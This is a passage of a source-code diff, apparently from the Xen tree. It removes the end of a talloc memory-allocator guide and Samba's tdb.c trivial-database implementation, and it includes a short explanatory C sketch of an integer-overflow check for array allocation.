-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_realloc_fn(const void *ctx, void *ptr, size_t size);
-
-This is a non-macro version of talloc_realloc(), which is useful 
-as libraries sometimes want a ralloc function pointer. A realloc()
-implementation encapsulates the functionality of malloc(), free() and
-realloc() in one call, which is why it is useful to be able to pass
-around a single function pointer.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_autofree_context(void);
-
-This is a handy utility function that returns a talloc context
-which will be automatically freed on program exit. This can be used
-to reduce the noise in memory leak reports.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_check_name(const void *ptr, const char *name);
-
-This function checks if a pointer has the specified name. If it does
-then the pointer is returned. It it doesn't then NULL is returned.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc_get_type(const void *ptr, type);
-
-This macro allows you to do type checking on talloc pointers. It is
-particularly useful for void* private pointers. It is equivalent to
-this:
-
-   (type *)talloc_check_name(ptr, #type)
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-talloc_set_type(const void *ptr, type);
-
-This macro allows you to force the name of a pointer to be a
-particular type. This can be used in conjunction with
-talloc_get_type() to do type checking on void* pointers.
-
-It is equivalent to this:
-   talloc_set_name_const(ptr, #type)
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-talloc_get_size(const void *ctx);
-
-This function lets you know the amount of memory alloced so far by
-this context. It does NOT account for subcontext memory.
-This can be used to calculate the size of an array.
-
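
Note on the talloc_array() entry in the guide removed above: the
"integer overflow protection for the multiply" it describes can be
sketched in plain C. This is only an illustration under assumptions;
checked_array_alloc() is a hypothetical helper built on malloc(), and it
is not talloc's actual implementation.

```c
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper (not part of talloc): allocate room for `count`
 * elements of `el_size` bytes each.  Returns NULL, rather than a buffer
 * that is silently too small, when el_size * count would overflow. */
static void *checked_array_alloc(size_t el_size, size_t count)
{
        /* count > SIZE_MAX / el_size means el_size * count wraps around */
        if (el_size != 0 && count > SIZE_MAX / el_size)
                return NULL;
        return malloc(el_size * count);
}
```

A caller treats a NULL return exactly like any other allocation
failure, so the overflow case needs no separate error path.
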
diff -r 10a8fae412c5 tools/xenstore/tdb.c
--- a/tools/xenstore/tdb.c      Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,2151 +0,0 @@
- /* 
-   Unix SMB/CIFS implementation.
-
-   trivial database library
-
-   Copyright (C) Andrew Tridgell              1999-2004
-   Copyright (C) Paul `Rusty' Russell             2000
-   Copyright (C) Jeremy Allison                           2000-2003
-   
-     ** NOTE! The following LGPL license applies to the tdb
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-   
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-
-#ifndef _SAMBA_BUILD_
-#ifdef HAVE_CONFIG_H
-#include <config.h>
-#endif
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <fcntl.h>
-#include <unistd.h>
-#include <string.h>
-#include <fcntl.h>
-#include <errno.h>
-#include <sys/mman.h>
-#include <sys/stat.h>
-#include "tdb.h"
-#include <stdarg.h>
-#include "talloc.h"
-#undef HAVE_MMAP
-#else
-#include "includes.h"
-#include "lib/tdb/include/tdb.h"
-#include "system/time.h"
-#include "system/shmem.h"
-#include "system/filesys.h"
-#endif
-
-#define TDB_MAGIC_FOOD "TDB file\n"
-#define TDB_VERSION (0x26011967 + 6)
-#define TDB_MAGIC (0x26011999U)
-#define TDB_FREE_MAGIC (~TDB_MAGIC)
-#define TDB_DEAD_MAGIC (0xFEE1DEAD)
-#define TDB_ALIGNMENT 4
-#define MIN_REC_SIZE (2*sizeof(struct list_struct) + TDB_ALIGNMENT)
-#define DEFAULT_HASH_SIZE 131
-#define TDB_PAGE_SIZE 0x2000
-#define FREELIST_TOP (sizeof(struct tdb_header))
-#define TDB_ALIGN(x,a) (((x) + (a)-1) & ~((a)-1))
-#define TDB_BYTEREV(x) (((((x)&0xff)<<24)|((x)&0xFF00)<<8)|(((x)>>8)&0xFF00)|((x)>>24))
-#define TDB_DEAD(r) ((r)->magic == TDB_DEAD_MAGIC)
-#define TDB_BAD_MAGIC(r) ((r)->magic != TDB_MAGIC && !TDB_DEAD(r))
-#define TDB_HASH_TOP(hash) (FREELIST_TOP + (BUCKET(hash)+1)*sizeof(tdb_off))
-#define TDB_DATA_START(hash_size) (TDB_HASH_TOP(hash_size-1))
-
-
-/* NB assumes there is a local variable called "tdb" that is the
- * current context, also takes doubly-parenthesized print-style
- * argument. */
-#define TDB_LOG(x) tdb->log_fn x
-
-/* lock offsets */
-#define GLOBAL_LOCK 0
-#define ACTIVE_LOCK 4
-
-#ifndef MAP_FILE
-#define MAP_FILE 0
-#endif
-
-#ifndef MAP_FAILED
-#define MAP_FAILED ((void *)-1)
-#endif
-
-#ifndef discard_const_p
-# if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T)
-#  define discard_const(ptr) ((void *)((intptr_t)(ptr)))
-# else
-#  define discard_const(ptr) ((void *)(ptr))
-# endif
-# define discard_const_p(type, ptr) ((type *)discard_const(ptr))
-#endif
-
-/* free memory if the pointer is valid and zero the pointer */
-#ifndef SAFE_FREE
-#define SAFE_FREE(x) do { if ((x) != NULL) {talloc_free(discard_const_p(void *, (x))); (x)=NULL;} } while(0)
-#endif
-
-#define BUCKET(hash) ((hash) % tdb->header.hash_size)
-TDB_DATA tdb_null;
-
-/* all contexts, to ensure no double-opens (fcntl locks don't nest!) */
-static TDB_CONTEXT *tdbs = NULL;
-
-static int tdb_munmap(TDB_CONTEXT *tdb)
-{
-       if (tdb->flags & TDB_INTERNAL)
-               return 0;
-
-#ifdef HAVE_MMAP
-       if (tdb->map_ptr) {
-               int ret = munmap(tdb->map_ptr, tdb->map_size);
-               if (ret != 0)
-                       return ret;
-       }
-#endif
-       tdb->map_ptr = NULL;
-       return 0;
-}
-
-static void tdb_mmap(TDB_CONTEXT *tdb)
-{
-       if (tdb->flags & TDB_INTERNAL)
-               return;
-
-#ifdef HAVE_MMAP
-       if (!(tdb->flags & TDB_NOMMAP)) {
-               tdb->map_ptr = mmap(NULL, tdb->map_size, 
-                                   PROT_READ|(tdb->read_only? 0:PROT_WRITE), 
-                                   MAP_SHARED|MAP_FILE, tdb->fd, 0);
-
-               /*
-                * NB. When mmap fails it returns MAP_FAILED *NOT* NULL !!!!
-                */
-
-               if (tdb->map_ptr == MAP_FAILED) {
-                       tdb->map_ptr = NULL;
-                       TDB_LOG((tdb, 2, "tdb_mmap failed for size %d (%s)\n", 
-                                tdb->map_size, strerror(errno)));
-               }
-       } else {
-               tdb->map_ptr = NULL;
-       }
-#else
-       tdb->map_ptr = NULL;
-#endif
-}
-
-/* Endian conversion: we only ever deal with 4 byte quantities */
-static void *convert(void *buf, uint32_t size)
-{
-       uint32_t i, *p = buf;
-       for (i = 0; i < size / 4; i++)
-               p[i] = TDB_BYTEREV(p[i]);
-       return buf;
-}
-#define DOCONV() (tdb->flags & TDB_CONVERT)
-#define CONVERT(x) (DOCONV() ? convert(&x, sizeof(x)) : &x)
-
-/* the body of the database is made of one list_struct for the free space
-   plus a separate data list for each hash value */
-struct list_struct {
-       tdb_off next; /* offset of the next record in the list */
-       tdb_len rec_len; /* total byte length of record */
-       tdb_len key_len; /* byte length of key */
-       tdb_len data_len; /* byte length of data */
-       uint32_t full_hash; /* the full 32 bit hash of the key */
-       uint32_t magic;   /* try to catch errors */
-       /* the following union is implied:
-               union {
-                       char record[rec_len];
-                       struct {
-                               char key[key_len];
-                               char data[data_len];
-                       }
-                       uint32_t totalsize; (tailer)
-               }
-       */
-};
-
-/* a byte range locking function - return 0 on success
-   this functions locks/unlocks 1 byte at the specified offset.
-
-   On error, errno is also set so that errors are passed back properly
-   through tdb_open(). */
-static int tdb_brlock(TDB_CONTEXT *tdb, tdb_off offset, 
-                     int rw_type, int lck_type, int probe)
-{
-       struct flock fl;
-       int ret;
-
-       if (tdb->flags & TDB_NOLOCK)
-               return 0;
-       if ((rw_type == F_WRLCK) && (tdb->read_only)) {
-               errno = EACCES;
-               return -1;
-       }
-
-       fl.l_type = rw_type;
-       fl.l_whence = SEEK_SET;
-       fl.l_start = offset;
-       fl.l_len = 1;
-       fl.l_pid = 0;
-
-       do {
-               ret = fcntl(tdb->fd,lck_type,&fl);
-       } while (ret == -1 && errno == EINTR);
-
-       if (ret == -1) {
-               if (!probe && lck_type != F_SETLK) {
-                       /* Ensure error code is set for log fun to examine. */
-                       tdb->ecode = TDB_ERR_LOCK;
-                       TDB_LOG((tdb, 5,"tdb_brlock failed (fd=%d) at offset %d rw_type=%d lck_type=%d\n", 
-                                tdb->fd, offset, rw_type, lck_type));
-               }
-               /* Generic lock error. errno set by fcntl.
-                * EAGAIN is an expected return from non-blocking
-                * locks. */
-               if (errno != EAGAIN) {
-               TDB_LOG((tdb, 5, "tdb_brlock failed (fd=%d) at offset %d rw_type=%d lck_type=%d: %s\n", 
-                                tdb->fd, offset, rw_type, lck_type, 
-                                strerror(errno)));
-               }
-               return TDB_ERRCODE(TDB_ERR_LOCK, -1);
-       }
-       return 0;
-}
-
-/* lock a list in the database. list -1 is the alloc list */
-static int tdb_lock(TDB_CONTEXT *tdb, int list, int ltype)
-{
-       if (list < -1 || list >= (int)tdb->header.hash_size) {
-               TDB_LOG((tdb, 0,"tdb_lock: invalid list %d for ltype=%d\n", 
-                          list, ltype));
-               return -1;
-       }
-       if (tdb->flags & TDB_NOLOCK)
-               return 0;
-
-       /* Since fcntl locks don't nest, we do a lock for the first one,
-          and simply bump the count for future ones */
-       if (tdb->locked[list+1].count == 0) {
-               if (tdb_brlock(tdb,FREELIST_TOP+4*list,ltype,F_SETLKW, 0)) {
-                       TDB_LOG((tdb, 0,"tdb_lock failed on list %d ltype=%d (%s)\n", 
-                                          list, ltype, strerror(errno)));
-                       return -1;
-               }
-               tdb->locked[list+1].ltype = ltype;
-       }
-       tdb->locked[list+1].count++;
-       return 0;
-}
-
-/* unlock the database: returns void because it's too late for errors. */
-       /* changed to return int it may be interesting to know there
-          has been an error  --simo */
-static int tdb_unlock(TDB_CONTEXT *tdb, int list,
-                     int ltype __attribute__((unused)))
-{
-       int ret = -1;
-
-       if (tdb->flags & TDB_NOLOCK)
-               return 0;
-
-       /* Sanity checks */
-       if (list < -1 || list >= (int)tdb->header.hash_size) {
-               TDB_LOG((tdb, 0, "tdb_unlock: list %d invalid (%d)\n", list, tdb->header.hash_size));
-               return ret;
-       }
-
-       if (tdb->locked[list+1].count==0) {
-               TDB_LOG((tdb, 0, "tdb_unlock: count is 0\n"));
-               return ret;
-       }
-
-       if (tdb->locked[list+1].count == 1) {
-               /* Down to last nested lock: unlock underneath */
-               ret = tdb_brlock(tdb, FREELIST_TOP+4*list, F_UNLCK, F_SETLKW, 0);
-       } else {
-               ret = 0;
-       }
-       tdb->locked[list+1].count--;
-
-       if (ret)
-               TDB_LOG((tdb, 0,"tdb_unlock: An error occurred unlocking!\n")); 
-       return ret;
-}
-
-/* This is based on the hash algorithm from gdbm */
-static uint32_t default_tdb_hash(TDB_DATA *key)
-{
-       uint32_t value; /* Used to compute the hash value.  */
-       uint32_t   i;   /* Used to cycle through random values. */
-
-       /* Set the initial value from the key size. */
-       for (value = 0x238F13AF * key->dsize, i=0; i < key->dsize; i++)
-               value = (value + (key->dptr[i] << (i*5 % 24)));
-
-       return (1103515243 * value + 12345);  
-}
-
-/* check for an out of bounds access - if it is out of bounds then
-   see if the database has been expanded by someone else and expand
-   if necessary 
-   note that "len" is the minimum length needed for the db
-*/
-static int tdb_oob(TDB_CONTEXT *tdb, tdb_off len, int probe)
-{
-       struct stat st;
-       if (len <= tdb->map_size)
-               return 0;
-       if (tdb->flags & TDB_INTERNAL) {
-               if (!probe) {
-                       /* Ensure ecode is set for log fn. */
-                       tdb->ecode = TDB_ERR_IO;
-                       TDB_LOG((tdb, 0,"tdb_oob len %d beyond internal malloc size %d\n",
-                                (int)len, (int)tdb->map_size));
-               }
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-
-       if (fstat(tdb->fd, &st) == -1)
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-
-       if (st.st_size < (off_t)len) {
-               if (!probe) {
-                       /* Ensure ecode is set for log fn. */
-                       tdb->ecode = TDB_ERR_IO;
-                       TDB_LOG((tdb, 0,"tdb_oob len %d beyond eof at %d\n",
-                                (int)len, (int)st.st_size));
-               }
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-
-       /* Unmap, update size, remap */
-       if (tdb_munmap(tdb) == -1)
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       tdb->map_size = st.st_size;
-       tdb_mmap(tdb);
-       return 0;
-}
-
-/* write a lump of data at a specified offset */
-static int tdb_write(TDB_CONTEXT *tdb, tdb_off off, void *buf, tdb_len len)
-{
-       if (tdb_oob(tdb, off + len, 0) != 0)
-               return -1;
-
-       if (tdb->map_ptr)
-               memcpy(off + (char *)tdb->map_ptr, buf, len);
-#ifdef HAVE_PWRITE
-       else if (pwrite(tdb->fd, buf, len, off) != (ssize_t)len) {
-#else
-       else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off
-                || write(tdb->fd, buf, len) != (off_t)len) {
-#endif
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_IO;
-               TDB_LOG((tdb, 0,"tdb_write failed at %d len=%d (%s)\n",
-                          off, len, strerror(errno)));
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-       return 0;
-}
-
-/* read a lump of data at a specified offset, maybe convert */
-static int tdb_read(TDB_CONTEXT *tdb,tdb_off off,void *buf,tdb_len len,int cv)
-{
-       if (tdb_oob(tdb, off + len, 0) != 0)
-               return -1;
-
-       if (tdb->map_ptr)
-               memcpy(buf, off + (char *)tdb->map_ptr, len);
-#ifdef HAVE_PREAD
-       else if (pread(tdb->fd, buf, len, off) != (off_t)len) {
-#else
-       else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off
-                || read(tdb->fd, buf, len) != (off_t)len) {
-#endif
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_IO;
-               TDB_LOG((tdb, 0,"tdb_read failed at %d len=%d (%s)\n",
-                          off, len, strerror(errno)));
-               return TDB_ERRCODE(TDB_ERR_IO, -1);
-       }
-       if (cv)
-               convert(buf, len);
-       return 0;
-}
-
-/* don't allocate memory: used in tdb_delete path. */
-static int tdb_key_eq(TDB_CONTEXT *tdb, tdb_off off, TDB_DATA key)
-{
-       char buf[64];
-       uint32_t len;
-
-       if (tdb_oob(tdb, off + key.dsize, 0) != 0)
-               return -1;
-
-       if (tdb->map_ptr)
-               return !memcmp(off + (char*)tdb->map_ptr, key.dptr, key.dsize);
-
-       while (key.dsize) {
-               len = key.dsize;
-               if (len > sizeof(buf))
-                       len = sizeof(buf);
-               if (tdb_read(tdb, off, buf, len, 0) != 0)
-                       return -1;
-               if (memcmp(buf, key.dptr, len) != 0)
-                       return 0;
-               key.dptr += len;
-               key.dsize -= len;
-               off += len;
-       }
-       return 1;
-}
-
-/* read a lump of data, allocating the space for it */
-static char *tdb_alloc_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_len len)
-{
-       char *buf;
-
-       if (!(buf = talloc_size(tdb, len))) {
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_OOM;
-               TDB_LOG((tdb, 0,"tdb_alloc_read malloc failed len=%d (%s)\n",
-                          len, strerror(errno)));
-               return TDB_ERRCODE(TDB_ERR_OOM, buf);
-       }
-       if (tdb_read(tdb, offset, buf, len, 0) == -1) {
-               SAFE_FREE(buf);
-               return NULL;
-       }
-       return buf;
-}
-
-/* read/write a tdb_off */
-static int ofs_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d)
-{
-       return tdb_read(tdb, offset, (char*)d, sizeof(*d), DOCONV());
-}
-static int ofs_write(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d)
-{
-       tdb_off off = *d;
-       return tdb_write(tdb, offset, CONVERT(off), sizeof(*d));
-}
-
-/* read/write a record */
-static int rec_read(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec)
-{
-       if (tdb_read(tdb, offset, rec, sizeof(*rec),DOCONV()) == -1)
-               return -1;
-       if (TDB_BAD_MAGIC(rec)) {
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_CORRUPT;
-               TDB_LOG((tdb, 0,"rec_read bad magic 0x%x at offset=%d\n", rec->magic, offset));
-               return TDB_ERRCODE(TDB_ERR_CORRUPT, -1);
-       }
-       return tdb_oob(tdb, rec->next+sizeof(*rec), 0);
-}
-static int rec_write(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec)
-{
-       struct list_struct r = *rec;
-       return tdb_write(tdb, offset, CONVERT(r), sizeof(r));
-}
-
-/* read a freelist record and check for simple errors */
-static int rec_free_read(TDB_CONTEXT *tdb, tdb_off off, struct list_struct *rec)
-{
-       if (tdb_read(tdb, off, rec, sizeof(*rec),DOCONV()) == -1)
-               return -1;
-
-       if (rec->magic == TDB_MAGIC) {
-               /* this happens when a app is showdown while deleting a record - we should
-                  not completely fail when this happens */
-               TDB_LOG((tdb, 0,"rec_free_read non-free magic 0x%x at offset=%d - fixing\n", 
-                        rec->magic, off));
-               rec->magic = TDB_FREE_MAGIC;
-               if (tdb_write(tdb, off, rec, sizeof(*rec)) == -1)
-                       return -1;
-       }
-
-       if (rec->magic != TDB_FREE_MAGIC) {
-               /* Ensure ecode is set for log fn. */
-               tdb->ecode = TDB_ERR_CORRUPT;
-               TDB_LOG((tdb, 0,"rec_free_read bad magic 0x%x at offset=%d\n", 
-                          rec->magic, off));
-               return TDB_ERRCODE(TDB_ERR_CORRUPT, -1);
-       }
-       if (tdb_oob(tdb, rec->next+sizeof(*rec), 0) != 0)
-               return -1;
-       return 0;
-}
-
-/* update a record tailer (must hold allocation lock) */
-static int update_tailer(TDB_CONTEXT *tdb, tdb_off offset,
-                        const struct list_struct *rec)
-{
-       tdb_off totalsize;
-
-       /* Offset of tailer from record header */
-       totalsize = sizeof(*rec) + rec->rec_len;
-       return ofs_write(tdb, offset + totalsize - sizeof(tdb_off),
-                        &totalsize);
-}
-
-static tdb_off tdb_dump_record(TDB_CONTEXT *tdb, tdb_off offset)
-{
-       struct list_struct rec;
-       tdb_off tailer_ofs, tailer;
-
-       if (tdb_read(tdb, offset, (char *)&rec, sizeof(rec), DOCONV()) == -1) {
-               printf("ERROR: failed to read record at %u\n", offset);
-               return 0;
-       }
-
-       printf(" rec: offset=0x%08x next=0x%08x rec_len=%d key_len=%d data_len=%d full_hash=0x%x magic=0x%x\n",
-              offset, rec.next, rec.rec_len, rec.key_len, rec.data_len, rec.full_hash, rec.magic);
-
-       tailer_ofs = offset + sizeof(rec) + rec.rec_len - sizeof(tdb_off);
-       if (ofs_read(tdb, tailer_ofs, &tailer) == -1) {
-               printf("ERROR: failed to read tailer at %u\n", tailer_ofs);
-               return rec.next;
-       }
-
-       if (tailer != rec.rec_len + sizeof(rec)) {
-               printf("ERROR: tailer does not match record! tailer=%u totalsize=%u\n",
-                               (unsigned int)tailer, (unsigned int)(rec.rec_len + sizeof(rec)));
-       }
-       return rec.next;
-}
-
-static int tdb_dump_chain(TDB_CONTEXT *tdb, int i)
-{
-       tdb_off rec_ptr, top;
-
-       top = TDB_HASH_TOP(i);
-
-       if (tdb_lock(tdb, i, F_WRLCK) != 0)
-               return -1;
-
-       if (ofs_read(tdb, top, &rec_ptr) == -1)
-               return tdb_unlock(tdb, i, F_WRLCK);
-
-       if (rec_ptr)
-               printf("hash=%d\n", i);
-
-       while (rec_ptr) {
-               rec_ptr = tdb_dump_record(tdb, rec_ptr);
-       }
-
-       return tdb_unlock(tdb, i, F_WRLCK);
-}
-
-void tdb_dump_all(TDB_CONTEXT *tdb)
-{
-       unsigned int i;
-       for (i=0;i<tdb->header.hash_size;i++) {
-               tdb_dump_chain(tdb, i);
-       }
-       printf("freelist:\n");
-       tdb_dump_chain(tdb, -1);
-}
-
-int tdb_printfreelist(TDB_CONTEXT *tdb)
-{
-       int ret;
-       long total_free = 0;
-       tdb_off offset, rec_ptr;
-       struct list_struct rec;
-
-       if ((ret = tdb_lock(tdb, -1, F_WRLCK)) != 0)
-               return ret;
-
-       offset = FREELIST_TOP;
-
-       /* read in the freelist top */
-       if (ofs_read(tdb, offset, &rec_ptr) == -1) {
-               tdb_unlock(tdb, -1, F_WRLCK);
-               return 0;
-       }
-
-       printf("freelist top=[0x%08x]\n", rec_ptr );
-       while (rec_ptr) {
-               if (tdb_read(tdb, rec_ptr, (char *)&rec, sizeof(rec), DOCONV()) == -1) {
-                       tdb_unlock(tdb, -1, F_WRLCK);
-                       return -1;
-               }
-
-               if (rec.magic != TDB_FREE_MAGIC) {
-                       printf("bad magic 0x%08x in free list\n", rec.magic);
-                       tdb_unlock(tdb, -1, F_WRLCK);
-                       return -1;
-               }
-
-               printf("entry offset=[0x%08x], rec.rec_len = [0x%08x (%d)] (end = 0x%08x)\n", 
-                      rec_ptr, rec.rec_len, rec.rec_len, rec_ptr + rec.rec_len);
-               total_free += rec.rec_len;
-
-               /* move to the next record */
-               rec_ptr = rec.next;
-       }
-       printf("total rec_len = [0x%08x (%d)]\n", (int)total_free, 
-               (int)total_free);
-
-       return tdb_unlock(tdb, -1, F_WRLCK);
-}
-
-/* Remove an element from the freelist.  Must have alloc lock. */
-static int remove_from_freelist(TDB_CONTEXT *tdb, tdb_off off, tdb_off next)
-{
-       tdb_off last_ptr, i;
-
-       /* read in the freelist top */
-       last_ptr = FREELIST_TOP;
-       while (ofs_read(tdb, last_ptr, &i) != -1 && i != 0) {
-               if (i == off) {
-                       /* We've found it! */
-                       return ofs_write(tdb, last_ptr, &next);
-               }
-               /* Follow chain (next offset is at start of record) */
-               last_ptr = i;
-       }
-       TDB_LOG((tdb, 0,"remove_from_freelist: not on list at off=%d\n", off));
-       return TDB_ERRCODE(TDB_ERR_CORRUPT, -1);
-}
-
-/* Add an element into the freelist. Merge adjacent records if
-   neccessary. */
-static int tdb_free(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec)
-{
-       tdb_off right, left;
-
-       /* Allocation and tailer lock */
-       if (tdb_lock(tdb, -1, F_WRLCK) != 0)
-               return -1;
-
-       /* set an initial tailer, so if we fail we don't leave a bogus record */
-       if (update_tailer(tdb, offset, rec) != 0) {
-               TDB_LOG((tdb, 0, "tdb_free: upfate_tailer failed!\n"));
-               goto fail;
-       }
-
-       /* Look right first (I'm an Australian, dammit) */
-       right = offset + sizeof(*rec) + rec->rec_len;
-       if (right + sizeof(*rec) <= tdb->map_size) {
-               struct list_struct r;
-
-               if (tdb_read(tdb, right, &r, sizeof(r), DOCONV()) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_free: right read failed at %u\n", right));
-                       goto left;
-               }
-
-               /* If it's free, expand to include it. */
-               if (r.magic == TDB_FREE_MAGIC) {
-                       if (remove_from_freelist(tdb, right, r.next) == -1) {
-                               TDB_LOG((tdb, 0, "tdb_free: right free failed at %u\n", right));
-                               goto left;
-                       }
-                       rec->rec_len += sizeof(r) + r.rec_len;
-               }
-       }
-
-left:
-       /* Look left */
-       left = offset - sizeof(tdb_off);
-       if (left > TDB_DATA_START(tdb->header.hash_size)) {
-               struct list_struct l;
-               tdb_off leftsize;
-               
-               /* Read in tailer and jump back to header */
-               if (ofs_read(tdb, left, &leftsize) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_free: left offset read failed at %u\n", left));
-                       goto update;
-               }
-               left = offset - leftsize;
-
-               /* Now read in record */
-               if (tdb_read(tdb, left, &l, sizeof(l), DOCONV()) == -1) {
-                       TDB_LOG((tdb, 0, "tdb_free: left read failed at %u (%u)\n", left, leftsize));
-                       goto update;
-               }
-
-               /* If it's free, expand to include it. */
-               if (l.magic == TDB_FREE_MAGIC) {
-                       if (remove_from_freelist(tdb, left, l.next) == -1) {
-                               TDB_LOG((tdb, 0, "tdb_free: left free failed at %u\n", left));
-                               goto update;
-                       } else {
-                               offset = left;
-                               rec->rec_len += leftsize;
-                       }
-               }
-       }
-
-update:
-       if (update_tailer(tdb, offset, rec) == -1) {
-               TDB_LOG((tdb, 0, "tdb_free: update_tailer failed at %u\n", offset));
-               goto fail;
-       }
-
-       /* Now, prepend to free list */
-       rec->magic = TDB_FREE_MAGIC;
-
-       if (ofs_read(tdb, FREELIST_TOP, &rec->next) == -1 ||
-           rec_write(tdb, offset, rec) == -1 ||
-           ofs_write(tdb, FREELIST_TOP, &offset) == -1) {
-               TDB_LOG((tdb, 0, "tdb_free record write failed at offset=%d\n", offset));
-               goto fail;
-       }
-
-       /* And we're done. */
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return 0;
-
- fail:
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return -1;
-}
-
-
-/* expand a file.  we prefer to use ftruncate, as that is what posix
-  says to use for mmap expansion */
-static int expand_file(TDB_CONTEXT *tdb, tdb_off size, tdb_off addition)
-{
-       char buf[1024];
-#ifdef HAVE_FTRUNCATE_EXTEND
-       if (ftruncate(tdb->fd, size+addition) != 0) {
-               TDB_LOG((tdb, 0, "expand_file ftruncate to %d failed (%s)\n", 
-                          size+addition, strerror(errno)));
-               return -1;
-       }
-#else
-       char b = 0;
-
-#ifdef HAVE_PWRITE
-       if (pwrite(tdb->fd,  &b, 1, (size+addition) - 1) != 1) {
-#else
-       if (lseek(tdb->fd, (size+addition) - 1, SEEK_SET) != (off_t)(size+addition) - 1 || 
-           write(tdb->fd, &b, 1) != 1) {
-#endif
-               TDB_LOG((tdb, 0, "expand_file to %d failed (%s)\n", 
-                          size+addition, strerror(errno)));
-               return -1;
-       }
-#endif
-
-       /* now fill the file with something. This ensures that the file isn't sparse, which would be
-          very bad if we ran out of disk. This must be done with write, not via mmap */
-       memset(buf, 0x42, sizeof(buf));
-       while (addition) {
-               int n = addition>sizeof(buf)?sizeof(buf):addition;
-#ifdef HAVE_PWRITE
-               int ret = pwrite(tdb->fd, buf, n, size);
-#else
-               int ret;
-               if (lseek(tdb->fd, size, SEEK_SET) != (off_t)size)
-                       return -1;
-               ret = write(tdb->fd, buf, n);
-#endif
-               if (ret != n) {
-                       TDB_LOG((tdb, 0, "expand_file write of %d failed (%s)\n", 
-                                  n, strerror(errno)));
-                       return -1;
-               }
-               addition -= n;
-               size += n;
-       }
-       return 0;
-}
-
-
-/* expand the database at least size bytes by expanding the underlying
-   file and doing the mmap again if necessary */
-static int tdb_expand(TDB_CONTEXT *tdb, tdb_off size)
-{
-       struct list_struct rec;
-       tdb_off offset;
-
-       if (tdb_lock(tdb, -1, F_WRLCK) == -1) {
-               TDB_LOG((tdb, 0, "lock failed in tdb_expand\n"));
-               return -1;
-       }
-
-       /* must know about any previous expansions by another process */
-       tdb_oob(tdb, tdb->map_size + 1, 1);
-
-       /* always make room for at least 10 more records, and round
-           the database up to a multiple of TDB_PAGE_SIZE */
-       size = TDB_ALIGN(tdb->map_size + size*10, TDB_PAGE_SIZE) - tdb->map_size;
-
-       if (!(tdb->flags & TDB_INTERNAL))
-               tdb_munmap(tdb);
-
-       /*
-        * We must ensure the file is unmapped before doing this
-        * to ensure consistency with systems like OpenBSD where
-        * writes and mmaps are not consistent.
-        */
-
-       /* expand the file itself */
-       if (!(tdb->flags & TDB_INTERNAL)) {
-               if (expand_file(tdb, tdb->map_size, size) != 0)
-                       goto fail;
-       }
-
-       tdb->map_size += size;
-
-       if (tdb->flags & TDB_INTERNAL) {
-               char *new_map_ptr = talloc_realloc_size(tdb, tdb->map_ptr,
-                                                       tdb->map_size);
-               if (!new_map_ptr) {
-                       tdb->map_size -= size;
-                       goto fail;
-               }
-               tdb->map_ptr = new_map_ptr;
-       } else {
-               /*
-                * We must ensure the file is remapped before adding the space
-                * to ensure consistency with systems like OpenBSD where
-                * writes and mmaps are not consistent.
-                */
-
-               /* We're ok if the mmap fails as we'll fallback to read/write */
-               tdb_mmap(tdb);
-       }
-
-       /* form a new freelist record */
-       memset(&rec,'\0',sizeof(rec));
-       rec.rec_len = size - sizeof(rec);
-
-       /* link it into the free list */
-       offset = tdb->map_size - size;
-       if (tdb_free(tdb, offset, &rec) == -1)
-               goto fail;
-
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return 0;
- fail:
-       tdb_unlock(tdb, -1, F_WRLCK);
-       return -1;
-}
-
-
-/* 
-   the core of tdb_allocate - called when we have decided which
-   free list entry to use
- */
